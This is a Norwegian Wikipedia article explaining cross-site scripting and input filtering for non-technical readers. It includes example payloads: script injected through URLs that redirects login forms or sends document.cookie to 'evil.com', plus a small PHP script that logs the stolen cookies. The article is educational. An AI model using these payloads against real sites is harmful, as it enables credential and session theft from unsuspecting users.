Cross Site Scripting

Fra Wikipedia, den frie encyklopedi

Cross-site scripting, ofte forkortet til XSS, er en teknikk som kan benyttes for å manipulere websider.

XSS-hull finnes i mange dynamiske sider som gjerne er laget i blant annet PHP. Tabben utviklere gjør er at de glemmer at all brukerinput må filtreres. Man kan f.eks. fjerne alle < og >. I PHP kan det gjøres slik: htmlspecialchars($input);

Hackere kan utnytte XSS-hull og:

• utføre phising angrep
• stjele cookies (informasjonskapsler)

Sjekkliste for å beskytte seg mot XSS er å filtrere all input fra brukeren, dvs. HTTP POST, HTTP GET og HTTP COOKIES.

Eksempelene som er vist i denne artikkelen er forsøkt forenklet slik at også ikke-tekniske lesere kan sjekke om et nettsted har XSS-hull.

Innhold 1 Eksempel (ikke-teknisk) 1.1 Eksempel på phising angrep (litt teknisk) 1.2 Eksempel på phising angrep i URL (litt teknisk) 1.3 Eksempel på stjeling av cookies (litt teknisk) 2 Referanser

[rediger] Eksempel (ikke-teknisk)

Du har en gjestebok, og noen skriver inn følgende melding til deg:

Hei du! God jul <script>alert("XSS hull!")</script>

• Hvis det kommer opp en meldingsboks når du leser gjesteboken så er den sårbar for XSS.
• Hvis ikke, er brukerinput blitt filtrert før meldingen ble lagret (i en flatfil eller en database).

[rediger] Eksempel på phising angrep (litt teknisk)

La oss si at vi har en slik form:

<form action="login.php" method="post">
<input type="text" name="user><br>
<input type="password" name="pass"><br><br>
<input type="submit" value="Logg inn">
</form>

Ved å forandre "login.php" til "http://evil.com/stjel.php" kan en hacker lagre alle brukernavn og passord som blir lagt inn. En avansert hacker kan automatisere scripet sitt slik at med en gang noen logger inn så blir passordet endret til noe annet.

[rediger] Eksempel på phising angrep i URL (litt teknisk)

De fleste XSS-hull finner man når man endre på URL'er. Ta denne URL'en:

http://good.com/index.php?msg=Hei du". 

For å bruke eksempelet overfor til å utføre et phising angrep kunne man ha oppgitt følgende URL til offeret:

http://good.com/index.php?msg=Hei du<script>document.forms[0].action.value='http://evil.com/stjel.php'</script>

[rediger] Eksempel på stjeling av cookies (litt teknisk)

Hvis en hacker vil stjele en annens cookies så kan han sende følgende URL til offeret:

http://good.com/index.php?msg=Hei du<script>document.location.href="http://evil.com/stjel.php?id="+document.cookie</script>

Idet offeret intetanende klikker på linken vil "stjel.php" kalles. Denne kan f.eks. se slik ut:

<?php
$cookies=$_GET['id'];
$fp=fopen("cookies.txt", "a");
fwrite($fp, "Nye cookies: $cookies \n");
?>

Hackeren kan så installere denne cookie'n i egen browser og vil da bli logget inn som offeret.

[rediger] Referanser

• The Cross-Site Scripting (XSS) FAQ @CGISecurity
• Cross-Site Scripting Info @Apache Software Foundation